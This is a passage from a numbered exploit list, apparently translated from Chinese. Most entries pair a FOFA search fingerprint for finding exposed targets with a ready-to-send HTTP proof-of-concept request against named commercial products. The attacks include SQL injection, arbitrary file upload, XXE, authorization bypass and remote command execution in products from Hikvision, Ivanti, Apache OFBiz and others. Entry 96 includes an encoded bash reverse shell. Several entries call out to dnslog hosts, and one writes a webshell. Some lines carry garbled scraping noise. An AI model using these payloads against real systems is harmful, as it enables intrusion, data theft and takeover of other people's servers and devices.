65. 优卡特 脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the file to write, dir gives the directory it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

: ^3 P! X* x D1 p$ m5 L75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
' o; u" n( ^- @- kFOFA:app="TELESQUARE-TLR-2005KSH"+ \' g& Z( S4 V. `4 e, W; c) \
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
& t5 {8 _2 @, YHost: x.x.x.x
$ z" H* h! I% f6 B: aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; z7 h/ X4 U3 R. @Connection: close+ B7 ^& i3 Q4 d# e2 z! h
Accept: */*
1 A. r p" M7 Q! o" w# zAccept-Language: en- x/ l/ C B, o6 h. O+ v
Accept-Encoding: gzip
7 l+ G S+ O ^; n- \, a. p! M. X {9 `! i0 w
$ P! }. T- P) P+ @: tGET /cgi-bin/test28256.txt HTTP/1.17 ]4 ~6 e2 @# R
Host: x.x.x.x3 L+ N* {: }$ w) t
% r6 u' j! P# k! `: @
76. 新开普 掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Echo URL: http://x.x.x.x/userfiles/index.jsp

86. tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
<params>
  <param>
    <value>
      <struct>
        <member>
          <name>test</name>
          <value>
            <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
          </value>
        </member>
      </struct>
    </value>
  </param>
</params>
</methodCall>

Generate the payload with ysoserial
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast Yingkeshi HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:1111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML file content; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
